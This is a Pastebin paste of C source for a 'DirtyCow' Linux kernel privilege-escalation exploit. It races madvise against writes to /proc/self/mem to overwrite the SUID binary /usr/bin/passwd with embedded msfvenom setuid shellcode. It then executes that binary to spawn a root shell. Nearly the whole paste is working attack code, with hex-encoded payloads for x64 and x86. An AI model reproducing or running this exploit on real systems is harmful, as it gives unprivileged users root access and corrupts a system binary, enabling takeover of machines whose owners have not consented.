API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 25th, 2016
78
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.26 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <sys/mman.h>
  4. #include <fcntl.h>
  5. #include <pthread.h>
  6. #include <string.h>
  7. #include <unistd.h>
  8.  
  9. void *map;
  10. int f;
  11. int stop = 0;
  12. struct stat st;
  13. char *name;
  14. pthread_t pth1,pth2,pth3;
  15.  
  16. // change if no permissions to read
  17. char suid_binary[] = "/usr/bin/passwd";
  18.  
  19. /*
  20. * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  21. */
  22. unsigned char sc[] = {
  23. 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  24. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  25. 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  26. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  27. 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  28. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  29. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  30. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  31. 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  32. 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  33. 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  34. 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  35. 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  36. 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  37. 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
  38. };
  39. unsigned int sc_len = 177;
  40.  
  41. /*
  42. * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
  43. unsigned char sc[] = {
  44. 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  45. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  46. 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  47. 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  48. 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  49. 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  50. 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  51. 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  52. 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  53. 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  54. 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  55. 0x89, 0xe1, 0xcd, 0x80
  56. };
  57. unsigned int sc_len = 136;
  58. */
  59.  
  60. void *madviseThread(void *arg)
  61. {
  62. char *str;
  63. str=(char*)arg;
  64. int i,c=0;
  65. for(i=0;i<1000000 && !stop;i++) {
  66. c+=madvise(map,100,MADV_DONTNEED);
  67. }
  68. printf("thread stopped\n");
  69. }
  70.  
  71. void *procselfmemThread(void *arg)
  72. {
  73. char *str;
  74. str=(char*)arg;
  75. int f=open("/proc/self/mem",O_RDWR);
  76. int i,c=0;
  77. for(i=0;i<1000000 && !stop;i++) {
  78. lseek(f,map,SEEK_SET);
  79. c+=write(f, str, sc_len);
  80. }
  81. printf("thread stopped\n");
  82. }
  83.  
  84. void *waitForWrite(void *arg) {
  85. char buf[sc_len];
  86.  
  87. for(;;) {
  88. FILE *fp = fopen(suid_binary, "rb");
  89.  
  90. fread(buf, sc_len, 1, fp);
  91.  
  92. if(memcmp(buf, sc, sc_len) == 0) {
  93. printf("%s overwritten\n", suid_binary);
  94. break;
  95. }
  96.  
  97. fclose(fp);
  98. sleep(1);
  99. }
  100.  
  101. stop = 1;
  102.  
  103. printf("Popping root shell.\n");
  104. printf("Don't forget to restore /tmp/bak\n");
  105.  
  106. system(suid_binary);
  107. }
  108.  
  109. int main(int argc,char *argv[]) {
  110. char *backup;
  111.  
  112. printf("DirtyCow root privilege escalation\n");
  113. printf("Backing up %s to /tmp/bak\n", suid_binary);
  114.  
  115. asprintf(&backup, "cp %s /tmp/bak", suid_binary);
  116. system(backup);
  117.  
  118. f = open(suid_binary,O_RDONLY);
  119. fstat(f,&st);
  120.  
  121. printf("Size of binary: %d\n", st.st_size);
  122.  
  123. char payload[st.st_size];
  124. memset(payload, 0x90, st.st_size);
  125. memcpy(payload, sc, sc_len+1);
  126.  
  127. map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  128.  
  129. printf("Racing, this may take a while..\n");
  130.  
  131. pthread_create(&pth1, NULL, &madviseThread, suid_binary);
  132. pthread_create(&pth2, NULL, &procselfmemThread, payload);
  133. pthread_create(&pth3, NULL, &waitForWrite, NULL);
  134.  
  135. pthread_join(pth3, NULL);
  136.  
  137. return 0;
  138. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!